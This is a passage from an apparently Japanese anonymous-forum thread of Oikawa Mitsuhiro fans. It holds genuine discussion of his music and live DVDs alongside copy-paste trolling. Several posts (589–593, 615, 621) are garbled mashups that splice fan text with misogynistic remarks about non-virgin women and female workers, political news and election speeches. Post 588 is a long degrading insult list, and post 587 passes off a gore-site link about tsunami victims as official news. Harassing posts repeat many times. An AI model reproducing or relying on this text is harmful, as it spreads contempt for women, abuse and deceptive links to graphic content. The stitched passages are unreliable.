崇高なシンクロニシティを味わうからであると思う。
同じベクトルとハイトを持ったシンクロニシティ。

ある日。
死んでしまった私の心を一種の麻薬のように。熱を枯渇させ、
美の渦に少しだけ足を踏み入れた感がある。

美の権化。及川光博に、ありがとうと言いたい。

584 :NO MUSIC NO NAME:2006/09/12(火) 09:00:55 ID:oTWEO+4I
>>561 これは大量虐殺でもない。

クライム・アートや、ジェノサイド、スーサイド・・・
他諸々のカタストロフィーを題材として創造・演出をするのには
ある程度の平穏で幸福な日常と、浅 い 絶望が必要だと。

世界が・人類が、真に深い絶望に瀕している時、
この先の道にも、光が射すこと・希望が在ることを
如何に眼前にいる、数多の人々に信じさせるか――?!
芸術家は、何を置いてもそのことを第一に考えるものだと、
諭してくれた作家がいた。
(これはつまり、>>559 >>561 への私的なレスポンスでもある。)

今、この時代に置いては、刺激でもなく癒しでもなく。宗教でも同調でもなく。

ひたすらに光と希望と、この世界の陽的な部分を謳歌してみせる、
ぬるま湯か、掘り炬燵のように居心地のよいあの空間の中で。
満面の笑みを湛え、愛と希望を歌うアーティストの顔が、明るく輝けば輝くほど。
だからこそ私は、真に世界が抱える闇の深さを実感して、恐ろしくなる。

禍禍しい狂気や、観客を奈落の底に落とすような惨劇が、
純粋なエンタテイメントとして、ひとつのメタファーとして、
ステージ上で演じられることのあるくらいまでに、平和な時が、また来て欲しいと思う。
スリリングで物騒で、剣呑なミチーが、私だって観たいよ。ステージの上ではね。


585 :NO MUSIC NO NAME:2006/09/12(火) 09:03:26 ID:KspmqSCv
>>574
映画監督トッド・ヘインズ(Velvet Goldmine)が、
青春時代に、あのカレイドスコープの権現みたいな男に夢中になったのと
似たようなきっかけだったんじゃないかな。思い起こしてみると。
曖昧なセクシュアリティーが境界線上で揺らめいてる…みたいなところが
自分的には大ヒットというかドンピシャだった。
でも、次第に彼は変化し脱皮し成長し…その部分に拘ってるだけでは、
もう健全にはフォローしていけなくなってきた。
(その辺は、トッド・ヘインズの愛憎とシンクロする部分が多々あり)
だから、もう今はあまりそこには拘らないようにしてる。

今は、もう、純粋に歌が全て。
生のライブの空間さえあれば他には何も要らないって言っても過言じゃない。
ミチーが、生のライブを一番大事にしてくれる歌手で良かったと思う。(その辺 >>561と同感)

586 :NO MUSIC NO NAME:2006/09/12(火) 09:05:18 ID:5LakJDeK
>>586
世間の風潮の可能性が高いな。
何故なら処女を忌避する文化も確実にあるからな。
だが、男女のあり方も所詮は世間の風潮にしか過ぎない。
国によって、歴史によって、男女のあり方は変わっていった。

処女という信仰を失った場合、この国の男女のあり方がどう変わるのか楽しみ
に見せてもらおうじゃないかw

あと、処女を忌避する文化とやらが一体女という生き物をどういう生態として
扱ったのか、その文化の男にとって女はなんだったのか、
女がその文化ではたして幸せだったのか調べてみるととても面白いと思うぞ。

>自ら人生を思索し哲学して作り上げた価値観

実際はこんなものに何の価値も無い。何故なら他人と協調された価値観の集合
が世間の風潮だからな。己の価値観で価値があると断言できるのは、己自身だ
け。周りには何の影響も与えない。

30年前の流行の服を着て街を歩くようなものだな。

587 :NO MUSIC NO NAME:2006/09/12(火) 09:08:39 ID:sSRofsKm
>>586 >「暴 力的な 威 厳」
あははw じーっとPC画面を睨みつけてブランクの意味を暫く考えこんでた。ニブくて失敬。

寛斎は、今はあまり服飾の方は力を入れていない?という噂を聞いた。
一時ミチーとコラボしていた某H氏の奇抜で装飾過多なコスチューム、
私的には、どうにもテイストではなかったので、(その線狙うなら)
カンサイ!カンサイ!!と、当時自分がしきりに雄叫びを挙げてたことを思い出した。
伯林での2作目にあたる名盤―― あの、凄まじく美しいジャケ写等々を撮影した、
某日本人敏腕写真家とのフォト・セッション、そろそろやってもいい頃だと思ってる。
どうしてかなかなか機会に恵まれないようだけれど。

ミチーも絵はかなり達者なようです。
が、油彩等の本格的絵画作品は見たことが無いな。
玄人風な漫画タッチのイラストが披露されるのをかつて何度も見たし、
コマを割った動きのある場面も巧みに描けるようで、似顔絵もそこそこ似てる。
毎日忙しくてイラストは描く余裕が無い…と話すのを読んだのは、何年前のことだろう。

いずれにせよ、今のところ、歌(と演技)以外の芸術を
もうひとつの創造の扉として展開する兆しは見えないように思われます。
ミュージシャンが、絵画・造型・デザイン等の活動によって
クリエイティヴィティーの枠を広げたり、本領である音楽の場を健全に保つ為の
別ベクトルでの意思発散のツールとしてそれを活用するのは良くある事だけれど、
彼の場合は、そういうバランスを、現状、歌(音楽活動)と演技の仕事との間で、
非常に上手く保っているように見える。
そのふたつが巧い具合に影響し合い、総合的な表現力を高める糧と成り得ているような。
つまり、演技をするように歌える歌い手であり、
演技には、音楽の抑揚が添えられているかのような。
まあ、私的な所感ではあるのだけれども。

余談: ↓ごく最近公式発表されたニュース。
ttp://www.ogrish.com/archives/tsunami_pictures_more_victims_Jan_03_2005.html
このシノプシス。凄過ぎると思いませんか・・・  ...I'm happy, hope he's happy, too...

588 :NO MUSIC NO NAME:2006/09/12(火) 09:11:16 ID:zh/f/g9c
>>586
ヒキコモリ、社会に対し極度の敵意を持つ、母親がパンチパーマ、
父親はもやしっ子か糖尿、常に人に嫌われる醜い容姿(小林薫系)、
バカ、IQ38以下、偏差値19、服は全てファッションセンターしまむら、
童貞、友達欲しくてネットをはじめたが上手く話の輪に入れない、
親がバカ、家が借家(平屋)、兄弟が多い、臭い、汚い、年賀状が来ない、
誕生会をしたことが無い、異性と話すとどもる、親戚が家に来ない、包茎、デブ、
以外に死なない、自殺を考えた事がある、親を恨んでいる、就職した事ない、
好き嫌いが多い、子供が寄り付かない、親にAVを借りに行かせる、
アニメAVを見る、電車男に未だに憧れてる、女コテと絡む奴が許せない、
死王の知性を妬んでいる、死王の容姿を妬んでいる、弟がヤンキー、
弟に苛められてる、兄は自殺、コスプレして2ちゃんしてる、成人してからウンコ
漏らした事がある、足が臭い、腋臭、体臭が毒ガス、フケがスライム、鼻毛伸び放題、
近所の小学生の苛めの的、家がゴミ屋敷、猫を虐待しようとして飼い主に見つかりリンチ、
趣味オナニー、最近の親の口癖が「そろそろ死んでくれ…」、母親が自殺未遂、父親はオヤジ狩りにあい死去、
今でも中学の時苛められえてた奴に使われてる、人が手を上げるだけで殴られると思い驚く、
ただベンチに座ってただけで警察に痴漢と思われ逮捕された、
もう俺の人生は終わったと思っている(つか始まってさえいないよね)、

こんなだな。
まぁ奴の不幸はこの10倍くらいあんだろうけど ぷっ

589 :NO MUSIC NO NAME:2006/09/12(火) 09:14:21 ID:sSRofsKm
>>585
そうですか・・・なんか気が引けてしまいます。
生も良いけど、映像とかに加工されつくしたPVなどの音楽が好きです自分は。
でも私は無所属、無党派の皆様の代表としてしっかり、
生を否定はしないけど、自分は、ね。

ニュースやマスコミにも一番に取り上げられ、一気に注目を浴び、本当にラッキーボーイです。いろんな事がありました。
私は政党に属していないのですが、どっぷり入らせていただき、沢山学ぶことができました。
私自身、出来る限り精一杯全力で走れたことは、なんとも快感です。今回の選挙で非難もでるでしょう。

なんか、この「及川光博の世界」って、年がランダムだから、
並べ替えしてみたら、
少しトーンダウンする時期があったようですね。
私達の思いを背負ってくれる人を選びました。きっと、もっと品川区は良くなるはずです。
良い都議会議員とのつながりを持つことが出来ましたので、
私自身の仕事の幅も広げられるようがんばるつもりです。
何があったんだろう。

及川光博ヘヴィ・フリークでない私が、色々生意気言ってすみません、
私は政党に属していないのですが、どっぷり入らせていただき、沢山学ぶことができました。
私自身、出来る限り精一杯全力で走れたことは、なんとも快感です。今回の選挙で非難もでるでしょう。
でも私は無所属、無党派の皆様の代表としてしっかり、
私は主に洋楽のPVを網羅している人間で、
邦楽のPVでこれだけの魅せるPVや画になる人物は、
及川光博以外にこの日本には魅力的な人物は居ない。

これは大変ユニークで、大事な稀有の存在とオモワレ
都議会選挙良い結果で嬉しいです
都議会選挙が終わりました。激戦でしたね。私が応援した候補者は、見事に当選し、がんばったかいがありました。
ニュースやマスコミにも一番に取り上げられ、一気に注目を浴び、本当にラッキーボーイです。いろんな事がありました。


590 :NO MUSIC NO NAME:2006/09/12(火) 09:16:50 ID:GWwprPOa
こうやって言葉にすると大袈裟に見えるけど、でも
ミチー自身が言うところの『世界キラキラ大作戦』というのは
貴方の奥さんは、あなたと出会った時に既に中古品でした。
これは、貴方の奥さんの処女膜を破った男のみならず、
あなたが奥さんに出会う前に貴方の奥さんを抱いた他の男達のすべてが
両者の体の動きや体にかかる負荷が全く同じと仮定するならば違いはないだろうけど
実際にはそうでもないから若干の違いはあるでしょう。

季節の声を肌で感じることでリラックスした気分で歩けるとか、
そういった目に見えない部分では色々あるかも。
つまるところそういう事なんじゃなかろうかと。

音楽(アート)に出来る事には限りがあるはずで、
逆に言えば出来ない事の方が多いかもしれない。
機種にもよるだろうけど、マシーンの方が天候に左右されず心拍数や速度を管理しながら効率良く歩けると見ることも出来るし
外を歩くとアップダウンがあって距離以上に消費できるとか
《歌を作り歌う→→→受け手が歓ぶ》っていう単純な流れにただ乗っかるだけなら
多分どのアーティストでも出来るんだろうけど。
でも、ミチーにとっては、今はもうそれだけじゃ駄目なんだろうね。
(うたかた。ツアー@大阪一日目は、その最たる事例だと思う)

私的に、ただ単純にリスナーとしての歓びだけを求めるなら
『よし。キラキラ大作戦、一緒に頑張っていこう。』と思ってしまう。

一緒にっていうとおこがましいけど。そこはまぁ、やっぱりミチー好きだしw
マンセーとか依存とか、ましてや宗教的絶対崇拝みたいなのじゃなく、
ミチーのアートを心から愛する受け手の一人として、ミチーを応援したい訳で
そりゃやっぱり自分好みの音楽をやってほしいと思ったりするけど、
あなたが、貴方の奥さんを初めて抱いたときよりも良い状態の奥さんの肉体を弄んでいたのです。
貴方と出会う前より若かった時の状態の良い肉体を他の男達が弄んでいたのです。
ミチー自身の、世界の闇を前にしてのあの凄まじい使命感と
あの崇高なまでに暖かい笑顔・眼差しを見せられてしまったら。

591 :NO MUSIC NO NAME:2006/09/12(火) 09:20:59 ID:Y3cBbzAA
CDをヴォカールキャンセルして聞くと、音楽が浮きまくりますね。
やっぱり、及川光博というアーティストは、
 一方で「中国も東トルキスタン独立運動などテロの脅威に直面してきたので、9・11以降、国際的な
テロ撲滅活動に積極的に参加してきた」と述べた。
 その上で「中国は上海協力機構(SCO)の枠組みに基づいて、ロシアや中央アジア諸国との間で
テロ撲滅に関する条約を締結した」「上海協力機構はテロとの戦いで成果をあげてきた」と主張した。
あの容貌と、声と、全体の雰囲気をして、歌が成り立っている事を
実感しました。

他人の血が汚らわしいんだからな。
信者同士が集まると、仲間であるのに
互いに汚らわしいと感じているんだろうな。

総合芸術といったところでしょうか?
舞台とか衣装も手がけているみたいだし、正直言えば生見てみたいですね。

辛いだけなら誰もしなくなると思う。趣味板に献血スレがある通り、
趣味で献血する人もいるくらいだから。

確かに針を刺すときは痛いけど、それはその時だけだからそんなに
辛くない。仕事をしているとせっかくの休みの日に時間を取られる方が
ずっと辛いと思うようになる。

表でガンガンキャピりまくって、モラリティや僕のゼリー、あるいは
ココロノヤミで、内部のネガティヴで毒のある歌を聴かせて、

霧の中でに男を見ると、どんな男もグッド・ルッキング・ガイに見える手法が
有るけれど、及川光博は、本物の好い男だから、その振り幅は大きくなると
思います。確かにあの人は麗人。男はどんなに嫉妬するだろうか。

基本理念では、現在の自民党の政治を「『扇動政治』が台頭している」と批判し、
「共生」「公正」の理念に基づき「常識の政治」を行うと宣言した。
そのせいで、思うような仕事が出来ていないんではなかろうか?

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
今年デヴュー10周年らしいけど、俳優や雑誌、ラジオ、様々なメディアで、
どれだけ多くの仕事をこなしてきたんだろう。どれだけ多くの人格やキャラクター
を演じて・・・そしてどれだけ多くのファンの心を掴んで煙に巻き、遠くから
まとまったのは組織票しか取れないという所が困る。というわけで今後は
小選挙区の完全実施を求める。あと一票の格差も一対一に是正すべき。
手招きしてきたんだろう。真の好い男のやり方。
もしかしたら小沢は選挙を経ずに、自民を分裂させ政界再編コース
で政権を奪取するかもしれん。いやその可能性が高い気がする。
雲をつかむような、あのもどかしさと夢。

謂わば「ケムに巻く」ようなやり方、及川さんの深淵と文字通り
心の闇を具間見せることで、魅力を増大させる効果があると思います。

592 :NO MUSIC NO NAME:2006/09/12(火) 09:25:18 ID:61XP2ojP
歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?外資は男女平等だと考えて求職に行き、
そこでは女の優遇がないことに気がつく馬鹿な女がいるらしい。
日本の女にとって女の優遇が男女平等なのだろう。
あのような動員をして熱狂せしめる人物は及川光博において他には
残念ながらこの日本においては居ないと。私は思う。
産休、育児休暇、生理休暇をとる効率の悪い労働は採用されなくてもしかたがない。

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
それは差別でなく、経済活動である。
生のライブの空間さえあれば他には何も要らないって言っても過言じゃない。
優秀な女がいるのは事実であって優秀な経営者も存在するが、
彼女らは積極的に女を採用しようとはしない。
このことが全てを語っている。
ミチーが、生のライブを一番大事にしてくれる歌手で良かったと思う。(その辺 >>569と同感)
もともと優秀な女は優遇を求めない。
なぜなら、優遇されて高い地位についたと思われるからである。
それは屈辱でしかない。

一流大学、理工系、経済学部、法学部は圧倒的に女が少ない。
平均で見たとき、女が男性より低賃金は当たり前。

実際はこんなものに何の価値も無い。何故なら他人と協調された価値観の集合
が世間の風潮だからな。己の価値観で価値があると断言できるのは、己自身だ
け。周りには何の影響も与えない。
それがXTC。まさしく狂乱の精神を私たちに植え付け、個々の中にマルティプライズ
させうる能力が、彼にはある。

593 :NO MUSIC NO NAME:2006/09/12(火) 09:29:16 ID:HF1K26Nn
ここにいる多くのベイベ、ファン暦の長い人と語るのは至極傲慢ではあると、
自分で自覚しながら、私は自分の今の存在意義として、及川光弘を、
語りたく思う。cold fire。冷たい炎。これはミックに旦那を寝取られた
アンジーの歌でもあるが。それはさておき。魔性は年齢・非処女にかかわらず、態度も外見も処女っぽいところはあると思うよ
一時ミチーとコラボしていた某H氏の奇抜で装飾過多なコスチューム、
私的には、どうにもテイストではなかったので、(その線狙うなら)
意識的にそうしているのとも異なる。

平均的非処女も、非処女だからこそ優しい女、非処女だからこそもののわかった女、非処女だからこそまっとうな女というのもいる。
が、ミュージシャンが、絵画・造型・デザイン等の活動によって
クリエイティヴィティーの枠を広げたり、本領である音楽の場を健全に保つ為の
別ベクトルでの意思発散のツールとしてそれを活用するのは良くある事だけれど、
彼の場合は、そういうバランスを、現状、歌(音楽活動)と演技の仕事との間で、
非常に上手く保っているように見える。

上の3者でもギリギリ状況では鷹揚な態度、発言、思考回路はなく
私はこれこれこれだけのことはした、それなのにあなたは何?といった天下のお裁きwをいともたやすく下す感がある
一方、平均からすっ飛んでる魔性は
男への恨み・傷を知らない、怖いもの知らずの処女のごとく
フォローが習い性になっている。文句の間にもユーモアが混じるのでこちらの立場も持つ。
また、
右に習えで黙っていたとしても
誰からも責任の所在を求められない場面でも
ちゃちゃっとフォロー発言する。馬鹿になってまでもする。

そのフォローゆえ面倒な事になっても女だからいつでも社会から降りられるという俗っぽいカラクリゆえの言動なのか
あれの性格ゆえの言動なのかはわからない。
ただ、自分が守りたい人間のために自分の品位を落とす事をいとわない
他者に誤解されてもしらを切る

歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?
あの腹のくくり具合とあの鉄の口の堅さはプラスよりマイナスに働いている事も多々。
ただ、立場の在る男はそういった女を欲しているので
7割の雑魚に誤解されていても少数の見方が精鋭揃いというのが魔性の特徴。死んでしまった私の心を一種の麻薬のように。熱を枯渇させ、
美の渦に少しだけ足を踏み入れた感がある。
理詰めで言われるとこちらが悪い事は自覚しすぎているので
頭が痛くなり逃げたくなる。子供という一生の責任もいないだけに結果別れる。
一生そばに置いておきたいほど好きではなかったせいもあるだろう

美の権化。及川光博に、ありがとうと言いたい。

594 :NO MUSIC NO NAME:2006/09/12(火) 22:22:27 ID:Mq7SD+EL
おお。この人かなり健気で可愛いな。
時事的なニュースは止めて。
ここの私含めてのまとめ・ランダム並べ替えコピペになってるw
手の込んだことして本当に乙。
だが。
及川光博はあんたを助けてもくれないし。
存在も否定より過酷なアンノウンキャットだよ。
面白いね。
どんどんやってね。全部見ていてあげるよ。
そうすれば、あんたの望みが叶うかも知れないし、
気持ちが晴れるかもしれない。
現実は逆だと思うけど。
話をしよう。カンバセーションピースだ。
何がしたい?
何かトラブルを抱えているなら。
二倍にして前向きに返してあげる。
そうすればあんたの無様な姿を見なくて済むからね。

及川光博を恨む。

595 :NO MUSIC NO NAME:2006/09/12(火) 22:23:12 ID:Mq7SD+EL
気が変わったんだ。
後ろに戻るよ。

596 :NO MUSIC NO NAME:2006/09/12(火) 22:25:45 ID:33WayG+5
スレの流れを読まず書いてしまいます。
「ツキノヒカリ」ライブでミッチーさんにはまりました。
次回参加する時は皆さんみたいにダンスをマスターして行きたいので
ライブDVDを買おうと思っているのですが、「GOLDEN GUY」と「日本舞踏館」
どちらがおすすめでしょうか? 

597 :NO MUSIC NO NAME:2006/09/12(火) 22:31:03 ID:Mq7SD+EL
また気が変わったんだ。

もっと気の利いた面白いコピペしなよw
あんた及川光博のベイベなんだろ?
違うのか?ん?創造的なやつ。出来ないだろうけど。

マヂレスすると。
あんたのことは知ってるよ。
色々な及川関連スレでコピペ嵐してる奴だよね。
なんか今回進化してるけど微妙にw
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。

カオスは好きな空間だ。
結構爽快だよベイベ
いい仕事だ。

598 :NO MUSIC NO NAME:2006/09/12(火) 22:32:11 ID:Mq7SD+EL



599 :NO MUSIC NO NAME:2006/09/12(火) 22:36:55 ID:Mq7SD+EL
>>596さn
ごめんいつものことだが。
変なデムパ挟んじゃってすまんです。

600 :NO MUSIC NO NAME:2006/09/12(火) 23:00:48 ID:g42e8OSd
>>596
ダンスを覚えたいということなら、ライブDVDよりも
PVを集めた「及川光博の世界」をおススメしたい
ところだけど、あえてライブDVDというのなら
やっぱり最新の「日本舞踏館」を見てほしいかな。

601 :NO MUSIC NO NAME:2006/09/12(火) 23:02:38 ID:2hiTBLjb
>>596
自分もライブならまずは「舞踏館」がオススメ。
「GOLDEN GUY」の時は…ちょっと「プクミチー化」がw
こっちもライブ映像としてはとてもよくできてるから大好きだけどね。


602 :NO MUSIC NO NAME:2006/09/12(火) 23:04:04 ID:Vb2FnDz1
>>596
初心者さんかな?いらっしゃい〜
ライブDVD、その2本なら私的には舞踏館がお薦めなんですが、
初心者さん的に色々楽しめるのはGOLDEN GUYかな。
2ツアー分だから一粒で二度美味しく、収録曲も多いし
色んな曲のノリがつかめるはずです。
出来れば両方とも買って観てほしいけどw
とりあえず最初はGOLDEN GUYでいかがでしょうか。

603 :NO MUSIC NO NAME:2006/09/12(火) 23:06:55 ID:Vb2FnDz1
あ、なんか迷わすような書き込みしちゃったorz

604 :NO MUSIC NO NAME:2006/09/12(火) 23:10:44 ID:Hl8s89TP
>596タン
ライヴDVDとしては個人的には「舞踏館」かな。最新だし
596タンがツキノヒカリに行ってるならかぶってる部分もあるから
ライヴを思い出したりできるだろうし…
でも「ゴールデン」には「禁猟区」付いてるしね…

うーん…両方でw(おい

605 :NO MUSIC NO NAME:2006/09/12(火) 23:11:49 ID:Hl8s89TP
うわ…かぶりまくりでスマソ
恥ずかシー(汗

606 :愛は火曜日まで:2006/09/12(火) 23:14:10 ID:hwwO9tq/
・・・・・いや別に、木曜日の子供でもわが心の金曜日、
ドライブインの土曜日、日曜日の朝…まあどれでもいいんだけども。

>>574-577 あたりで或る意味何かが出尽くしたような気もしないでもない。
自分としては(日付は変わってしまっていたが)昨日の夜に
そんな話がここで書けたのは嬉しかった。
自分がシーツの間に滑り込んで、朝の熱気の中でまどろんでいた間に、
スクリーミング・ロード・ヴァイロンが現れて、
綺麗に後始末までしてくれていたようだしw

怒りを込めて振り返る必要も、もう無いのかな?
でも、貴女が走ろうといえば走るし、隠れようといえば隠れるよ。

607 :NO MUSIC NO NAME:2006/09/12(火) 23:17:55 ID:1jJr65By
>>596
私もどっちかというと「GOLDEN GUY」かな。
金色で9年目まで(?)のミチーを見てから「舞踏館」を見た方が
ミチーの歴史が感じられていいかも。
ダンス覚える目的ということでも、曲数も多い金色を勧めます。

608 :NO MUSIC NO NAME:2006/09/12(火) 23:40:49 ID:9y8vjae3
おお。この人かなり健気で可愛いな。
時事的なニュースは止めて。
ここの私含めてのまとめ・ランダム並べ替えコピペになってるw
手の込んだことして本当に乙。
だが。
及川光博はあんたを助けてもくれないし。
存在も否定より過酷なアンノウンキャットだよ。
面白いね。
どんどんやってね。全部見ていてあげるよ。
そうすれば、あんたの望みが叶うかも知れないし、
気持ちが晴れるかもしれない。
現実は逆だと思うけど。
話をしよう。カンバセーションピースだ。
何がしたい?
何かトラブルを抱えているなら。
二倍にして前向きに返してあげる。
そうすればあんたの無様な姿を見なくて済むからね。

及川光博を恨む。

609 :NO MUSIC NO NAME:2006/09/12(火) 23:41:20 ID:9y8vjae3
気が変わったんだ。
後ろに戻るよ。

610 :NO MUSIC NO NAME:2006/09/12(火) 23:41:51 ID:9y8vjae3
また気が変わったんだ。

もっと気の利いた面白いコピペしなよw
あんた及川光博のベイベなんだろ?
違うのか?ん?創造的なやつ。出来ないだろうけど。

マヂレスすると。
あんたのことは知ってるよ。
色々な及川関連スレでコピペ嵐してる奴だよね。
なんか今回進化してるけど微妙にw
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。

カオスは好きな空間だ。
結構爽快だよベイベ
いい仕事だ。

611 :NO MUSIC NO NAME:2006/09/12(火) 23:48:48 ID:X6yLdGQ8
ID:Mq7SD+ELはメンヘル過ぎてキモイ
どっか自分でBLOGでもやってそこで書いてくれない?
自分に酔ってるのは気持ちいいのかもしれないが回りからみたら病気

その病が同じ病の荒らしを呼んでるんだよ

612 :NO MUSIC NO NAME:2006/09/12(火) 23:49:21 ID:nVk8OueR
また気が変わったんだ。

もっと気の利いた面白いコピペしなよw
あんた及川光博のベイベなんだろ?
違うのか?ん?創造的なやつ。出来ないだろうけど。

マヂレスすると。
あんたのことは知ってるよ。
色々な及川関連スレでコピペ嵐してる奴だよね。
なんか今回進化してるけど微妙にw
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。

カオスは好きな空間だ。
結構爽快だよベイベ
いい仕事だ。

613 :NO MUSIC NO NAME:2006/09/12(火) 23:49:59 ID:q9aOR06d
おお。この人かなり健気で可愛いな。
時事的なニュースは止めて。
ここの私含めてのまとめ・ランダム並べ替えコピペになってるw
手の込んだことして本当に乙。
だが。
及川光博はあんたを助けてもくれないし。
存在も否定より過酷なアンノウンキャットだよ。
面白いね。
どんどんやってね。全部見ていてあげるよ。
そうすれば、あんたの望みが叶うかも知れないし、
気持ちが晴れるかもしれない。
現実は逆だと思うけど。
話をしよう。カンバセーションピースだ。
何がしたい?
何かトラブルを抱えているなら。
二倍にして前向きに返してあげる。
そうすればあんたの無様な姿を見なくて済むからね。

及川光博を恨む。

614 :NO MUSIC NO NAME:2006/09/12(火) 23:50:29 ID:Rngpv7VX
また気が変わったんだ。

もっと気の利いた面白いコピペしなよw
あんた及川光博のベイベなんだろ?
違うのか?ん?創造的なやつ。出来ないだろうけど。

マヂレスすると。
あんたのことは知ってるよ。
色々な及川関連スレでコピペ嵐してる奴だよね。
なんか今回進化してるけど微妙にw
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。

カオスは好きな空間だ。
結構爽快だよベイベ
いい仕事だ。

615 :NO MUSIC NO NAME:2006/09/12(火) 23:51:21 ID:Oi1NPBqo
ここにいる多くのベイベ、ファン暦の長い人と語るのは至極傲慢ではあると、
自分で自覚しながら、私は自分の今の存在意義として、及川光弘を、
語りたく思う。cold fire。冷たい炎。これはミックに旦那を寝取られた
アンジーの歌でもあるが。それはさておき。魔性は年齢・非処女にかかわらず、態度も外見も処女っぽいところはあると思うよ
一時ミチーとコラボしていた某H氏の奇抜で装飾過多なコスチューム、
私的には、どうにもテイストではなかったので、(その線狙うなら)
意識的にそうしているのとも異なる。

平均的非処女も、非処女だからこそ優しい女、非処女だからこそもののわかった女、非処女だからこそまっとうな女というのもいる。
が、ミュージシャンが、絵画・造型・デザイン等の活動によって
クリエイティヴィティーの枠を広げたり、本領である音楽の場を健全に保つ為の
別ベクトルでの意思発散のツールとしてそれを活用するのは良くある事だけれど、
彼の場合は、そういうバランスを、現状、歌(音楽活動)と演技の仕事との間で、
非常に上手く保っているように見える。

上の3者でもギリギリ状況では鷹揚な態度、発言、思考回路はなく
私はこれこれこれだけのことはした、それなのにあなたは何?といった天下のお裁きwをいともたやすく下す感がある
一方、平均からすっ飛んでる魔性は
男への恨み・傷を知らない、怖いもの知らずの処女のごとく
フォローが習い性になっている。文句の間にもユーモアが混じるのでこちらの立場も持つ。
また、
右に習えで黙っていたとしても
誰からも責任の所在を求められない場面でも
ちゃちゃっとフォロー発言する。馬鹿になってまでもする。

そのフォローゆえ面倒な事になっても女だからいつでも社会から降りられるという俗っぽいカラクリゆえの言動なのか
あれの性格ゆえの言動なのかはわからない。
ただ、自分が守りたい人間のために自分の品位を落とす事をいとわない
他者に誤解されてもしらを切る

歌手としての及川光博は、影の一流としておきたい気持ちがあるのは、
独占欲が強いからか?
あの腹のくくり具合とあの鉄の口の堅さはプラスよりマイナスに働いている事も多々。
ただ、立場の在る男はそういった女を欲しているので
7割の雑魚に誤解されていても少数の見方が精鋭揃いというのが魔性の特徴。死んでしまった私の心を一種の麻薬のように。熱を枯渇させ、
美の渦に少しだけ足を踏み入れた感がある。
理詰めで言われるとこちらが悪い事は自覚しすぎているので
頭が痛くなり逃げたくなる。子供という一生の責任もいないだけに結果別れる。
一生そばに置いておきたいほど好きではなかったせいもあるだろう

美の権化。及川光博に、ありがとうと言いたい。

616 :NO MUSIC NO NAME:2006/09/12(火) 23:51:56 ID:M5bq6Kw6
おお。この人かなり健気で可愛いな。
時事的なニュースは止めて。
ここの私含めてのまとめ・ランダム並べ替えコピペになってるw
手の込んだことして本当に乙。
だが。
及川光博はあんたを助けてもくれないし。
存在も否定より過酷なアンノウンキャットだよ。
面白いね。
どんどんやってね。全部見ていてあげるよ。
そうすれば、あんたの望みが叶うかも知れないし、
気持ちが晴れるかもしれない。
現実は逆だと思うけど。
話をしよう。カンバセーションピースだ。
何がしたい?
何かトラブルを抱えているなら。
二倍にして前向きに返してあげる。
そうすればあんたの無様な姿を見なくて済むからね。

及川光博を恨む。

617 :NO MUSIC NO NAME:2006/09/12(火) 23:52:26 ID:M5bq6Kw6
また気が変わったんだ。

もっと気の利いた面白いコピペしなよw
あんた及川光博のベイベなんだろ?
違うのか?ん?創造的なやつ。出来ないだろうけど。

マヂレスすると。
あんたのことは知ってるよ。
色々な及川関連スレでコピペ嵐してる奴だよね。
なんか今回進化してるけど微妙にw
何か寂しいのか?悩みがあるのか?何かが思い通りにならなくて。
イライラしてるのか?ここのスレが自分の意のままにならないから。
そんな事してるのか?面白い人だな。餌は何がいい?
話しようぜ。あんた何を話したい?
及川光博以外の話題でも良いから。悩みでも良いから。
何でも言ってみろ。

カオスは好きな空間だ。
結構爽快だよベイベ
いい仕事だ。

618 :NO MUSIC NO NAME:2006/09/12(火) 23:54:49 ID:2e9vV5vW
>>617さん
セールス的にはきついかも知れませんが、あの秘密結社のような
怪しげな雰囲気は、素晴らしい。良い意味で一流には出来ない、
偉業だと思います。
一流は誰が見ても素晴らしく完成されたもの。でも二流三流の素晴らしさは、
隠れたことによる魅惑、、あの週刊誌の袋とじの魅惑のようなものがあって、
私はそんなところに価値を見出します。それは誰にでも分りえる価値観ではなく、
その人を心からリスペクトしたという証であると思うから。
マイノリティやアノニマスであることは、ある種のエクスタシーであると思う。
そこでだ。
セールスが上手く行かないなら、インディーズで良いんじゃないかな。
もう本人分ってる気がするけど。なんか最近では及川さんは、俳優業が多く、
歌が。パフォーマンスを駆使した露出が少なくなった気がする
それは寂しい。もっと新しい音楽が聞きたいです。

619 :596:2006/09/12(火) 23:55:21 ID:33WayG+5
たくさんのレスありがとうございます!
>>600さんが書かれているPV集のDVDも考えたのですが、
実際に客席での動きを知りたいなと思い、あえてライブDVDに
こだわってみました。・・・やはり迷いますねw
曲数が多い点では「GOLDEN GUY」、最新でいくと「舞踏館」ですね。
取りあえずもう少し悩んでみます。ありがとうございました。

620 :NO MUSIC NO NAME:2006/09/12(火) 23:55:48 ID:W3oBJipN
マヂレスすると。
あんた(ID:Mq7SD+EL)のことは知ってるよ。
色々な及川関連スレでコピペ嵐してる奴だよね。

621 :NO MUSIC NO NAME:2006/09/12(火) 23:57:22 ID:aQja4qCj
>>619
CDをヴォカールキャンセルして聞くと、音楽が浮きまくりますね。
やっぱり、及川光博というアーティストは、
 一方で「中国も東トルキスタン独立運動などテロの脅威に直面してきたので、9・11以降、国際的な
テロ撲滅活動に積極的に参加してきた」と述べた。
